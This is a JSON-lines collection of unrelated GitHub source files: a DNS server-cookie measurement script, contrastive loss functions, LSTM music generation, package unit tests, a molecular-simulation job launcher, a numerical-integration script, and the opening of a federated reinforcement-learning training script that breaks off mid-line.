+{"seq_id":"72587348809","text":"\"\"\"\nBase script for measuring whether IPs return server cookies.\nBy default, we'll retry the server a number of times if errors are received\n\"\"\"\n\nimport argparse\nimport json\nimport multiprocessing as mp\nimport signal\nimport sys\nimport time\nfrom typing import Union\n\nimport dns.resolver\nfrom dns.edns import GenericOption\nfrom dns.message import make_query\nfrom shared.query_parser_generator import QnameParserGenerator\nfrom tqdm import tqdm\n\nCLIENT_COOKIE_LENGTH = 8\nCOOKIE_OPT = 10\nCOOKIE = \"1e4ddeb526a1da40\"\njson_keys = [\"ip\", \"domain\", \"edns\", \"ccook\", \"scook\", \"slen\", \"rcode\", \"err\", \"isbind\", \"tsdiff\"]\n\n\nclass QPG(QnameParserGenerator):\n \"\"\" defines query format to include timestamp and og ip \"\"\"\n label_str = \"$key.$ts.$ip\"\n\n\ndef makedict(default=None):\n return {key: default for key in json_keys}\n\n\ndef make_cookie_query(qname: str, cookie_hex: str = COOKIE) -> dns.message:\n cookie = GenericOption(COOKIE_OPT, bytes.fromhex(cookie_hex))\n return make_query(qname, dns.rdatatype.A, use_edns=True,\n want_dnssec=False, options=[cookie])\n\n\ndef extract_cooks(r: dns.message.Message) -> (str, str):\n for o in r.options:\n if o.otype == COOKIE_OPT:\n return o.data[:8].hex(), o.data[8:].hex()\n return \"\", \"\"\n\n\ndef is_using_bind(scook: str, current_timestamp: int = None) -> Union[None, int]:\n \"\"\"\n Returns true if the server cookie is 128 bits and has a timestamp at the 5th-8th bytes.\n Bind or bind-like implementations have a timestamp at that location.\n Tolerance for the timestamp is 1hr in past and 30 min in future being valid. This seemed like a good range to use.\n\n :param scook: the cookie returned by the server\n :param current_timestamp: the timestamp to compare against. If none, gets current time\n :return: the difference between the bind ts and current time if bind, else None\n \"\"\"\n if len(scook) != 32: # bind cookie is 128 bits = 16 bytes = 32 hex characters\n return None\n cookie_timestamp = int(scook[8:16], 16)\n if current_timestamp is None:\n current_timestamp = int(time.time())\n if (current_timestamp - 60 * 60) <= cookie_timestamp <= (current_timestamp + 60 * 30):\n return cookie_timestamp - current_timestamp\n return None\n\n\ndef query(input_dict, try_again=5):\n \"\"\"\n :param input_dict: should contain an ip and domain key. 
IP will be queried for an A record of domain\n :param try_again: if greater than 0, retry up to N times if an error or no server cookie\n :return: a response dict with all relevant data\n \"\"\"\n res = makedict()\n res[\"ip\"] = input_dict[\"ip\"]\n if input_dict['domain'] is None:\n res['domain'] = QPG.gen('cookie-support.example.com', ip_addr=res['ip'], val=try_again)\n else:\n res[\"domain\"] = input_dict[\"domain\"] if \"domain\" in input_dict else input_dict[\"zone\"]\n\n q = make_cookie_query(res[\"domain\"])\n try:\n r: dns.message.Message = dns.query.udp(q, input_dict[\"ip\"], timeout=5)\n except Exception as e:\n if try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"err\"] = str(e)\n else:\n res[\"ccook\"], res[\"scook\"] = extract_cooks(r)\n if res[\"scook\"] == \"\" and try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"tsdiff\"] = is_using_bind(res[\"scook\"])\n res[\"rcode\"] = r.rcode()\n res[\"edns\"] = r.edns >= 0\n res[\"isbind\"] = res[\"tsdiff\"] is not None\n res[\"slen\"] = len(res[\"scook\"]) / 2\n\n return res\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=\"Run a series of dns queries on a list of IPs and record cookie info\")\n parser.add_argument('input', help=\"Input file containing a json lines with ip and optional domain keys. \"\n \"An 'A' query for 'domain' will be sent to 'ip'\")\n parser.add_argument('output', help=\"Output file to write results to\")\n parser.add_argument('-n', '--num-threads', help=\"Number of threads to execute queries\", default=64, type=int)\n parser.add_argument('-g', '--gen-domains', help=\"Generate domains to query for instead of getting from jsonl\",\n action='store_true')\n args = parser.parse_args(args)\n\n print(\"Getting targets...\")\n with open(args.input, 'r') as in_file:\n targets = [json.loads(t) for t in in_file.readlines()]\n if args.gen_domains:\n for t in targets:\n t[\"domain\"] = None\n\n threads = min(args.num_threads, len(targets))\n\n print(\"Starting threads...\")\n with open(args.output, 'w') as output:\n with mp.Pool(processes=threads, initializer=lambda: signal.signal(signal.SIGINT, signal.SIG_IGN)) as p:\n try:\n for result in tqdm(p.imap_unordered(query, targets), total=len(targets), unit=\"query\"):\n output.write(json.dumps(result) + \"\\n\")\n except KeyboardInterrupt:\n p.terminate()\n p.join()\n print(\"Exiting early from queries.\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"byu-imaal/dns-cookies-pam21","sub_path":"cookie_support.py","file_name":"cookie_support.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19950812810","text":"import torch\nimport torch.nn.functional as F\n\ndef oneway_infonce_loss(a, b, t, smoothing=0.0, labels=None):\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n loss = F.cross_entropy(logits, labels, label_smoothing=smoothing).mean()\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n accuracy = torch.sum(preds == labels) / len(a)\n \n return loss, accuracy\n\ndef infonce_loss(a, b, t, smoothing=0.0, labels=None):\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n '''\n if labels is not None:\n loss_a = F.cross_entropy(logits.T, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n loss_b = F.cross_entropy(logits, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n\n loss = (loss_a + loss_b) / 2\n else:'''\n loss = (F.cross_entropy(logits.T, gt, label_smoothing=smoothing).mean() +\n F.cross_entropy(logits, gt, label_smoothing=smoothing).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n\ndef flatnce_loss(a, b, t, smoothing=0.0, labels=None):\n #from https://github.com/Junya-Chen/FlatCLR/blob/main/flatclr.py\n\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T))# * torch.exp(t).clamp(max=100)\n labels = torch.arange(0, batch_size, device=logits.device)\n\n # discard the main diagonal from both: labels and similarities matrix\n mask = 1 - torch.eye(batch_size).to(logits.device) # Positive and negative example similarities\n logits_pos = torch.diagonal(logits).view(batch_size, -1) # Get positive similarities\n\n clogits_a = mask * (logits - logits_pos) * torch.exp(t).clamp(max=100, min=-100)\n clogits_b = mask * (logits.T - logits_pos) * torch.exp(t).clamp(max=100, min=-100) \n\n sum_a = torch.logsumexp(clogits_a, dim=1) - 1 # To offset exp(0) per row\n sum_b = torch.logsumexp(clogits_b, dim=1) - 1 \n sum_clogits = torch.cat([sum_a, sum_b], dim=0)\n\n loss_vector = torch.exp(sum_clogits-sum_clogits.detach())\n \n with torch.no_grad():\n dummy_logits = logits * mask\n dummy_loss = (F.cross_entropy(dummy_logits.T, labels, label_smoothing=smoothing).mean() +\n F.cross_entropy(dummy_logits, labels, label_smoothing=smoothing).mean()) / 2\n\n loss = loss_vector.mean() - 1 + dummy_loss\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == labels) +\n torch.sum(preds_t == labels)) / (batch_size * 2)\n\n return loss, accuracy\n\nclass SupConLoss(torch.nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, t_0=0.07, eps=1e-8):\n super(SupConLoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n self.epsilon = eps\n\n\n def forward(self, features, labels):\n \"\"\"Compute loss for model. 
If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n Returns:\n A loss scalar.\n \"\"\"\n batch_size = features.shape[0]\n\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(features.device)\n\n views = features.shape[1] # = n_views\n full_features = torch.cat(torch.unbind(features, dim=1), dim=0) # = [bsz*views, ...]\n\n # compute logits (cosine sim)\n anchor_dot_contrast = torch.matmul(F.normalize(full_features),\n F.normalize(full_features.T)) * torch.exp(self.temperature).clamp(100) # = [bsz*views, bsz*views]\n\n loss_0 = self._loss_from_dot(anchor_dot_contrast, mask, views, batch_size)\n loss_1 = self._loss_from_dot(anchor_dot_contrast.T, mask.T, views, batch_size)\n\n return (loss_0 + loss_1) / 2\n\n def _loss_from_dot(self, anchor_dot_contrast, mask, views, batch_size): #(anchor, contrast)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(views, views)\n # mask-out self-contrast cases\n logits_mask = 1 - torch.eye(views*batch_size, device=mask.device)\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True) + self.epsilon)\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n loss = - mean_log_prob_pos.view(views, batch_size).mean()\n\n return loss\n\nclass InfoNCELoss(torch.nn.Module):\n def __init__(self, t_0=0.07, eps=1e-8):\n super(InfoNCELoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n\n def forward(self, anchors, replicas):\n batch_size = anchors.shape[0]\n logits = (F.normalize(anchors) @ F.normalize(replicas.T)) * torch.exp(self.temperature).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n\n loss = (F.cross_entropy(logits.T, gt).mean() +\n F.cross_entropy(logits, gt).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n","repo_name":"jahuerta92/authorship-embeddings","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
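A minimal usage sketch for the infonce_loss function defined in the record above (shapes and the temperature value are illustrative assumptions; the function itself is assumed to be in scope):

import torch

a = torch.randn(8, 128, requires_grad=True)  # one view/modality of the batch
b = torch.randn(8, 128, requires_grad=True)  # paired view; row i of b matches row i of a
t = torch.tensor(0.07)                       # log-temperature, passed through exp() inside the loss

loss, accuracy = infonce_loss(a, b, t)       # symmetric cross-entropy over the similarity matrix
loss.backward()                              # gradients flow back into a and b
print(float(loss), float(accuracy))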
+{"seq_id":"27657232498","text":"import copy\nimport numpy as np\nimport tensorflow as tf\nfrom keras import Input, Model\nfrom keras.layers import Bidirectional, Dense, Dropout, LSTM\nfrom keras.optimizers import Adam\n\nfrom examples import remove_rhythm\nfrom musicLoading import make_midi, load_data\n\ndef get_model_to_train():\n inputs = Input(shape=(256,8), dtype=tf.int64)\n # inputs = Input(shape=X_train[0].shape)\n\n lstm = Bidirectional(LSTM(124), merge_mode='concat', dtype=tf.int64)(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n\n model = Model(inputs=inputs, outputs=[pred])\n opt = tf.keras.optimizers.Adam(lr=1e-3, decay=1e-5)\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n\ndef recursive_predic(model, startingData):\n result = copy.deepcopy(startingData)\n\n result.append([85,84,83,82,81,80,0,0])\n\n curData = copy.deepcopy(startingData)\n for i in range(16 * 32):\n curData = np.array([curData])\n newNotes = model.predict(curData)[0]\n notes = [0] * 8\n\n noteCount = 0\n\n for note in range(len(newNotes)):\n if newNotes[note] > .25:\n notes[noteCount] = note\n noteCount+=1\n if noteCount == 8:\n break\n\n result.append(notes)\n curData = np.delete(curData[0], 0, axis=0)\n curData = np.append(curData, [notes], axis=0)\n # curData = np.array([curData)\n\n print(\"Raw results\", result)\n\n return result\n\ndef results_to_midi(results):\n quantized = []\n\n for beat in results:\n curBeatNotes = []\n\n for note in beat:\n if note == 0:\n break;\n\n curBeatNotes.append([note + 21, 1])\n\n quantized.append(curBeatNotes)\n\n midi = make_midi(quantized, 480)\n midi.open(\"single notes.mid\", 'wb')\n midi.write()\n\nif __name__ == '__main__':\n session = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n # print(device_lib.list_local_devices())\n\n input_size = 256\n\n\n\n inputs = Input(shape=(256,8))\n lstm = Bidirectional(LSTM(124), merge_mode='concat')(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n model = Model(inputs=inputs, outputs=[pred])\n opt = Adam(lr=1e-3, decay=1e-5)\n\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n model.load_weights('best_weights.hdf5')\n\n\n midData = load_data(\"/home/whomagoo/github/MLMusic/Music/kunstderfuge.com/scarlatti 109.mid\")\n\n notes = remove_rhythm(midData)\n notes = notes[:input_size]\n\n # starting_notes = [[72, 64, 0, 0, 0, 0, 0, 0], [72, 69, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [63, 0, 0, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [68, 71, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [84, 72, 57, 0, 0, 0, 0, 0]]\n # padded_input = [[0] * 8] * (input_size - len(starting_notes)) + starting_notes\n\n i = 0\n for chord in notes:\n j = 0\n for note in chord:\n if note != 0:\n notes[i][j] -= 21\n\n j+=1\n i+=1\n\n results = recursive_predic(model, notes)\n\n print(results)\n\n results_to_midi(results)\n\n session.close()","repo_name":"WHOmagoo/Machine-Learning-Music","sub_path":"src/first_version.py","file_name":"first_version.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35914004390","text":"import unittest\nimport os\nfrom .helper import UtilityMethods\nimport multisite\n\n\nclass TestLocal(UtilityMethods):\n def test_add_local_site(self):\n config_file = os.path.join(self.workspace, 'add_local_site.json')\n msite = multisite.Multisite(config_file=config_file)\n msite.add_site('local', 'local-site', source_type='local')\n expected = {\n \"local\": {\n \"name\": \"local\",\n \"source\": \"local-site\",\n \"location\": \"local-site\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_existing_config_file(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n expected = {\n \"local-site\": {\n \"name\": \"local-site\",\n \"source\": \"local-site/\",\n \"location\": \"local-site/\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_bad_directory_path(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n with self.assertRaises(OSError):\n msite.add_site(\n 'bad-dir',\n os.path.join('archives', 'zip-site.zip'),\n source_type='local'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cmccandless/multisite","sub_path":"tests/local_test.py","file_name":"local_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7368187078","text":"# list of parameters (in this case torsional angle Y)\nPARAMETER_LIST = range(-180, 185, 5)\n\n# user defined function to start a job, depending on one element from PARAMETER_LIST\ndef run_calc(param):\n \n # modules necessary for running the job\n import os\n import shutil\n \n # user variables for calculation\n PLACEHOLDER = \"RESTRAINT_2\" # placeholder in CAST.txt file that is replaced by step number\n \n # create folder for current window\n os.mkdir(\"f_{}\".format(param))\n\n # copy necessary files to that folder (USER INPUT)\n shutil.copy(\"CAST.txt\", \"f_{}/CAST.txt\".format(param))\n shutil.copy(\"pentan.arc\", \"f_{}/pentan.arc\".format(param))\n shutil.copy(\"charmm22.prm\", \"f_{}/charmm22.prm\".format(param))\n shutil.copy(\"/home/susanne/CAST/optional_files/build/CAST_linux_x64_release\",\n \"f_{}/CAST.exe\".format(param))\n \n # important: set correct parameter in inputfile\n with open(\"f_{}/CAST.txt\".format(param)) as inp:\n x = inp.read()\n x = x.replace(PLACEHOLDER,str(float(param)))\n with open(\"f_{}/CAST.txt\".format(param),\"w\") as inp:\n inp.write(x)\n \n # submit calculation\n os.chdir(\"f_{}\".format(param))\n os.popen(\"chmod +x CAST.exe\")\n os.popen(\"./CAST.exe | tee CAST_OUTPUT.txt\")\n os.chdir(\"..\")\n\n\n########################################### PROGRAM ########################################\n\nfor p in PARAMETER_LIST:\n run_calc(p)\n \n","repo_name":"AKEngels/CAST","sub_path":"optional_files/scripts/umbrella_stuff/umbrella2d_helper.py","file_name":"umbrella2d_helper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41935628573","text":"from math import pi\n\nimport view\nimport integral\n\n\ndef main() -> None:\n tetta = [0.05, 0.05, 10.0]\n\n ns, ms = [], []\n md1s, md2s = [], []\n ints = []\n\n terminate = '0'\n while terminate == '0':\n try:\n ns.append(int(input(\"Input N: \")))\n ms.append(int(input(\"Input M: \")))\n param = float(input(\"Enter parameter: \"))\n print(\"Entry integration mode (0 - Gauss, 1 - Simpson)\")\n md1s.append(int(input(\"Outer integration mode: \")))\n md2s.append(int(input(\"Inner integration mode: \")))\n except ValueError:\n print(\"Invalid input data. Program is terminated.\")\n return\n\n lm = [[0, pi / 2], [0, pi / 2]]\n\n ints.append(integral.Integral(lm, [ns[-1], ms[-1]], [md1s[-1], md2s[-1]]))\n\n print(\"Result with {} as a parameter is {:.5f}\".format(tetta, ints[-1](param)))\n\n terminate = input(\"If you want stop execution, entry not 0?: \")\n view.plot(ints, tetta, ns, ms, md1s, md2s)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flash1ee/ca-labs-4th-sem-bmstu","sub_path":"lab_05/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1541886484","text":"# -*- coding: utf-8 -*-\n#from __future__ import division\nimport argparse\nimport bz2\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.append('../..')\nsys.path.append('./')\n\nimport pickle\nimport GLOBAL_PRARM as gp\n\nimport numpy as np\nimport math\nimport copy\nimport torch\nfrom tqdm import trange\nfrom collections import defaultdict, deque\n\nimport multiprocessing\nimport torch.multiprocessing\n# torch.multiprocessing.set_sharing_strategy('file_system')\n# TODO: When running in server, uncomment this line if needed\nimport copy as cp\n\nfrom acer_fedstep.agent import Agent\nfrom game import Decentralized_Game as Env\nfrom memory import ReplayMemory\nfrom test import test, test_p\n\n# from pympler.tracker import SummaryTracker\n# tracker = SummaryTracker()\n\n# Note that hyperparameters may originally be reported in ATARI game frames instead of agent steps\nparser = argparse.ArgumentParser(description='Rainbow')\nparser.add_argument('--id', type=str, default='default_acer_q', help='Experiment ID')\nparser.add_argument('--seed', type=int, default=123, help='Random seed')\nparser.add_argument('--disable-cuda', action='store_true', help='Disable CUDA')\nparser.add_argument('--T-max', type=int, default=int(50e6), metavar='STEPS',\n help='Number of training steps (4x number of frames)')\nparser.add_argument('--max-episode-length', type=int, default=int(108e3), metavar='LENGTH',\n help='Max episode length in game frames (0 to disable)')\n# TODO: Note that the change of UAV numbers should also change the history-length variable\nparser.add_argument('--previous-action-observable', action='store_false', help='Observe previous action? (AP)')\nparser.add_argument('--current-action-observable', action='store_true', help='Observe previous action? 
(AP)')\nparser.add_argument('--history-length', type=int, default=2, metavar='T',\n help='Total number of history state')\nparser.add_argument('--architecture', type=str, default='canonical_61obv_16ap', metavar='ARCH', help='Network architecture')\n# TODO: if select resnet8, obs v8 and dims 4 should be set in gp\nparser.add_argument('--hidden-size', type=int, default=256, metavar='SIZE', help='Network hidden size')\nparser.add_argument('--noisy-std', type=float, default=0.3, metavar='σ',\n help='Initial standard deviation of noisy linear layers')\nparser.add_argument('--atoms', type=int, default=21, metavar='C', help='Discretised size of value distribution')\nparser.add_argument('--V-min', type=float, default=-1, metavar='V', help='Minimum of value distribution support')\nparser.add_argument('--V-max', type=float, default=1, metavar='V', help='Maximum of value distribution support')\n# TODO: Make sure the value located inside V_min and V_max\nparser.add_argument('--epsilon-min', type=float, default=0.0, metavar='ep_d', help='Minimum of epsilon')\nparser.add_argument('--epsilon-max', type=float, default=0.0, metavar='ep_u', help='Maximum of epsilon')\nparser.add_argument('--epsilon-delta', type=float, default=0.0001, metavar='ep_d', help='Decreasing step of epsilon')\n# TODO: Set the ep carefully\nparser.add_argument('--action-selection', type=str, default='boltzmann', metavar='action_type',\n choices=['greedy', 'boltzmann', 'no_limit'],\n help='Type of action selection algorithm, 1: greedy, 2: boltzmann')\nparser.add_argument('--model', type=str, default=None, metavar='PARAM', help='Pretrained model (state dict)')\nparser.add_argument('--memory-capacity', type=int, default=int(12e3), metavar='CAPACITY',\n help='Experience replay memory capacity')\nparser.add_argument('--replay-frequency', type=int, default=4, metavar='k', help='Frequency of sampling from memory')\nparser.add_argument('--priority-exponent', type=float, default=0.5, metavar='ω',\n help='Prioritised experience replay exponent (originally denoted α)')\nparser.add_argument('--priority-weight', type=float, default=0.4, metavar='β',\n help='Initial prioritised experience replay importance sampling weight')\nparser.add_argument('--multi-step', type=int, default=1, metavar='n',\n help='Number of steps for multi-step return')\nparser.add_argument('--discount', type=float, default=1, metavar='γ', help='Discount factor')\nparser.add_argument('--target-update', type=int, default=int(4000), metavar='τ',\n help='Number of steps after which to update target network')\nparser.add_argument('--reward-clip', type=int, default=1, metavar='VALUE', help='Reward clipping (0 to disable)')\nparser.add_argument('--learning-rate', type=float, default=0.0000625, metavar='η', help='Learning rate')\nparser.add_argument('--reward-update-rate', type=float, default=0.01, metavar='η',\n help='Average value step rate (for non-episodic task)')\nparser.add_argument('--adam-eps', type=float, default=1.5e-4, metavar='ε', help='Adam epsilon')\nparser.add_argument('--batch-size', type=int, default=32, metavar='SIZE', help='Batch size')\nparser.add_argument('--better-indicator', type=float, default=1.05, metavar='b',\n help='The new model should be b times of old performance to be recorded')\n# TODO: Switch interval should not be large\nparser.add_argument('--learn-start', type=int, default=int(400), metavar='STEPS',\n help='Number of steps before starting training')\nparser.add_argument('--evaluate', action='store_true', help='Evaluate 
only')\nparser.add_argument('--data-reinforce', action='store_true', help='DataReinforcement')\n# TODO: Change this after debug\nparser.add_argument('--evaluation-interval', type=int, default=400, metavar='STEPS',\n help='Number of training steps between evaluations')\nparser.add_argument('--evaluation-episodes', type=int, default=1000, metavar='N',\n help='Number of evaluation episodes to average over')\n# TODO: Note that DeepMind's evaluation method is running the latest agent for 500K frames ever every 1M steps\n# TODO: Change this after debug\nparser.add_argument('--evaluation-size', type=int, default=20, metavar='N',\n help='Number of transitions to use for validating Q')\n# TODO: This evaluation-size is used for Q value evaluation, can be small if Q is not important\nparser.add_argument('--render', action='store_false', help='Display screen (testing only)')\nparser.add_argument('--enable-cudnn', action='store_true', help='Enable cuDNN (faster but nondeterministic)')\nparser.add_argument('--checkpoint-interval', default=0,\n help='How often to checkpoint the model, defaults to 0 (never checkpoint)')\nparser.add_argument('--memory', type=str,\n help='Path to save/load the memory from')\nparser.add_argument('--disable-bzip-memory', action='store_false',\n help='Don\\'t zip the memory file. Not recommended (zipping is a bit slower and much, much smaller)')\n# TODO: Change federated round each time\nparser.add_argument('--federated-round', type=int, default=20, metavar='F',\n help='Rounds to perform global combination, set a negative number to disable federated aggregation')\n\n# Setup\nargs = parser.parse_args()\n\nprint(' ' * 26 + 'Options')\nfor k, v in vars(args).items():\n print(' ' * 26 + k + ': ' + str(v))\nresults_dir = os.path.join('./results', args.id)\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\nmetrics = {'steps': [], 'rewards': [], 'Qs': [], 'best_avg_reward': -float('inf')}\nmetrics_all = {'steps': [], 'reward': []}\nnp.random.seed(args.seed)\ntorch.manual_seed(np.random.randint(1, 10000))\n# if torch.cuda.is_available() and not args.disable_cuda:\n# args.device = torch.device('cuda')\n# torch.cuda.manual_seed(np.random.randint(1, 10000))\n# torch.backends.cudnn.enabled = args.enable_cudnn\n# else:\n# args.device = torch.device('cpu')\nargs.device = torch.device('cpu')\n\n\n# Simple ISO 8601 timestamped logger\ndef log(s):\n print('[' + str(datetime.now().strftime('%Y-%m-%dT%H:%M:%S')) + '] ' + s)\n\n\ndef average_weights(list_of_weight):\n \"\"\"aggregate all weights\"\"\"\n averga_w = copy.deepcopy(list_of_weight[0])\n for key in averga_w.keys():\n for ind in range(1, len(list_of_weight)):\n averga_w[key] += list_of_weight[ind][key]\n averga_w[key] = torch.div(averga_w[key], len(list_of_weight))\n return averga_w\n\n\ndef load_memory(memory_path, disable_bzip):\n if disable_bzip:\n with open(memory_path, 'rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n with bz2.open(memory_path, 'rb') as zipped_pickle_file:\n return pickle.load(zipped_pickle_file)\n\n\ndef save_memory(memory, memory_path, disable_bzip, index=-1):\n # save ap mem\n memory_path = memory_path[0:-4] + str(index) + memory_path[-4:]\n if disable_bzip:\n with open(memory_path, 'wb') as pickle_file:\n pickle.dump(memory, pickle_file)\n else:\n with bz2.open(memory_path, 'wb') as zipped_pickle_file:\n pickle.dump(memory, zipped_pickle_file)\n\n\ndef run_game_once_parallel_random(new_game, train_history_aps_parallel, episode):\n train_examples_aps = []\n for _ in 
range(new_game.environment.ap_number):\n train_examples_aps.append([])\n eps, done = 0, True\n while eps < episode:\n if done:\n done = new_game.reset()\n state, action, action_logp, avail, reward, done, _ = new_game.step() # Step\n for index_p, ele_p in enumerate(state):\n neighbor_indice = new_game.environment.coop_graph.neighbor_indices(index_p, True)\n action_patch = np.append(action, [-1])\n train_examples_aps[index_p].append((ele_p, action[index_p], action_logp[index_p],\n action_patch[neighbor_indice],\n action, avail[index_p], reward[index_p], done))\n eps += 1\n train_history_aps_parallel.append(train_examples_aps)\n\n\n# Environment\nenv = Env(args)\naction_space = env.get_action_size()\n\n# Agent\ndqn = []\nmatric = []\nfor _ in range(env.environment.ap_number):\n # dqn.append(temp)\n dqn.append(Agent(args, env, _))\n matric.append(copy.deepcopy(metrics))\n\nglobal_model = Agent(args, env, \"Global_\")\n\n# If a model is provided, and evaluate is fale, presumably we want to resume, so try to load memory\nif args.model is not None and not args.evaluate:\n if not args.memory:\n raise ValueError('Cannot resume training without memory save path. Aborting...')\n elif not os.path.exists(args.memory):\n raise ValueError('Could not find memory file at {path}. Aborting...'.format(path=args.memory))\n\n mem_aps = []\n for index in range(env.environment.ap_number):\n path = os.path.join(args.memory, ('metrics_aps' + str(index) + '.pth'))\n mem_aps.append(load_memory(path, args.disable_bzip_memory))\nelse:\n mem_aps = []\n for _ in range(env.environment.ap_number):\n mem_aps.append(ReplayMemory(args, args.memory_capacity, env.remove_previous_action))\n\ntry:\n sis_list = dqn[0].assign_sister_nodes\nexcept AttributeError:\n pass\nelse:\n for _ in range(env.environment.ap_number):\n dqn[_].assign_sister_nodes(dqn, mem_aps)\n# assign sister nodes for MADDPG\n\npriority_weight_increase = (1 - args.priority_weight) / (args.T_max - args.learn_start)\n\n# Construct validation memory\nval_mem_aps = []\nfor _ in range(env.environment.ap_number):\n val_mem_aps.append(ReplayMemory(args, args.evaluation_size, env.remove_previous_action))\nif not gp.PARALLEL_EXICUSION:\n T, done = 0, True\n while T < args.evaluation_size:\n if done:\n done = env.reset()\n state, action, action_logp, avail, reward, done, _ = env.step()\n for index, ele in enumerate(state):\n neighbor_indice = env.environment.coop_graph.neighbor_indices(index, True)\n action_patch = np.append(action, [-1])\n val_mem_aps[index].append(ele, action[index], action_logp[index], action_patch[neighbor_indice],\n action, avail[index], reward[index], done)\n T += 1\nelse:\n num_cores = min(multiprocessing.cpu_count(), gp.ALLOCATED_CORES) - 1\n num_eps = math.ceil(args.evaluation_size / num_cores)\n # make sure each subprocess can finish all the game (end with done)\n with multiprocessing.Manager() as manager:\n train_history_aps = manager.list()\n\n process_list = []\n for _ in range(num_cores):\n process = multiprocessing.Process(target=run_game_once_parallel_random,\n args=(cp.deepcopy(env), train_history_aps, num_eps))\n process_list.append(process)\n\n for pro in process_list:\n pro.start()\n for pro in process_list:\n pro.join()\n pro.terminate()\n\n for res in train_history_aps:\n for index, memerys in enumerate(res):\n for state, a, alog, na, ga, av, rw, done in memerys:\n val_mem_aps[index].append(state, a, alog, na, ga, av, rw, done)\n\nif args.evaluate:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN 
